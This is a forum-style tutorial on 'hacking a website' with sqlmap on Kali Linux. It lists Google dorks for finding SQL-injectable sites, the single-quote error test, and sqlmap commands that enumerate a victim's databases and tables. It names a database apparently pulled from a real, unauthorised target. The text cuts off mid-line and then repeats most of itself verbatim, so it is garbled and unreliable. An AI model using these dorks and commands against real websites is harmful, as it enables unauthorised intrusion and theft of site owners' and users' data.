In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux.
Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.
Now follow my steps to hack a website using sqlmap.
Step 1
[*]Find Sql vulnerable site.
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.
Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below:
And press enter. If error appears like on the image below it means the website is vulnerable.
(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)
Ok, so we found the target. Now let's go ahed.
Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
Now we will get the database name of the website.
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.
Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables
Image has been scaled down 4% (700x49). Click this bar to view original image (723
Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.
Now follow my steps to hack a website using sqlmap.
Step 1
[*]Find Sql vulnerable site.
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.
Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below:
And press enter. If error appears like on the image below it means the website is vulnerable.
(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)
Ok, so we found the target. Now let's go ahed.
Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
Now we will get the database name of the website.
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.
Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables
Image has been scaled down 4% (700x49). Click this bar to view original image (723